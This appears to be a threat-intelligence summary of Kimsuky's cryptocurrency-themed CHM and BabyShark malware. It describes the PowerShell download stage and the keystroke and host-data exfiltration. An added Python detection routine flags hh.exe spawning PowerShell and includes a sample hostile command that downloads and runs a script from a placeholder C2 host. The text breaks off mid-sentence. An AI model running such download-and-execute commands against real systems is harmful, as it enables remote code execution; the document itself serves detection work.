Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
✅ Report Title: Kimsuky’s CHM and BabyShark Malware Using Cryptocurrency Theme
The S2W Threat Intelligence Center has published an analytical report on CHM and BabyShark malware leveraging cryptocurrency themes, attributed to the North Korea-backed APT group Kimsuky.
✅ Executive Summary:
1. Summary
- On May 26, 2025, during continuous tracking of the Kimsuky group, S2W’s Threat Intelligence Center TALON identified and analyzed CHM and BabyShark malware disguised with cryptocurrency-related themes.
- The CHM malware uses the Windows Compiled HTML Help (CHM) format and executes PowerShell commands via JavaScript embedded within HTML files, which then download and run additional scripts from a C2 server.
- The downloaded PowerShell script was identified as a BabyShark variant capable of exfiltrating host information, process data, file directories, and keystrokes from infected systems.
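As an added defensive example (not code from S2W's report), the following Python routine triages process-creation events for the parent-child chain the CHM stage above implies: the Windows help viewer hh.exe spawning PowerShell with download-and-execute cues on its command line. The hh.exe parent, the Sysmon-style event fields and every sample event are constructed assumptions.

```python
"""Triage process-creation events for PowerShell launched from a CHM help file.
Added example; assumes hh.exe renders the CHM and events carry parent, image, cmdline."""
import re
from pathlib import PureWindowsPath

# Constructed sample events; none are taken from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://c2.example.invalid/stage2'))\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Windows\hh.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo help opened"},
]

POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Command-line cues: remote fetch, in-memory or encoded execution, hidden window.
DOWNLOAD_CUE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
EXEC_CUE = re.compile(r"\bIEX\b|Invoke-Expression|-e(nc(odedcommand)?)?\b", re.I)
HIDE_CUE = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def classify(event: dict) -> tuple:
    """Return (severity, reasons); 'high' means hh.exe -> PowerShell with download+exec cues."""
    reasons = []
    if basename(event["parent"]) != "hh.exe" or basename(event["image"]) not in POWERSHELL:
        return "none", reasons
    reasons.append("PowerShell spawned by hh.exe (CHM viewer)")
    cmd = event["cmdline"]
    for cue, label in ((DOWNLOAD_CUE, "download cue"), (EXEC_CUE, "execution cue"),
                       (HIDE_CUE, "hidden/non-interactive flags")):
        if cue.search(cmd):
            reasons.append(label)
    return ("high" if len(reasons) >= 3 else "medium"), reasons

def triage(events: list) -> list:
    # Keep only matching events, with their index, severity and reasons.
    hits = [(i, *classify(e)) for i, e in enumerate(events)]
    return [h for h in hits if h[1] != "none"]

if __name__ == "__main__":
    for i, sev, why in triage(SAMPLE_EVENTS):
        print(f"event {i}: {sev} -> {'; '.join(why)}")
```

The cmd.exe child in the third sample is deliberately not flagged, so a deployment that also sees hh.exe -> cmd.exe -> powershell.exe chains would need to walk one more level of the process tree.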
📌 Key Malware File Information: CHM Malware (wallet.chm)
This file uses Microsoft’s CHM (Compiled HTML Help) format and contains a malicious HTML file. When the user opens the CHM …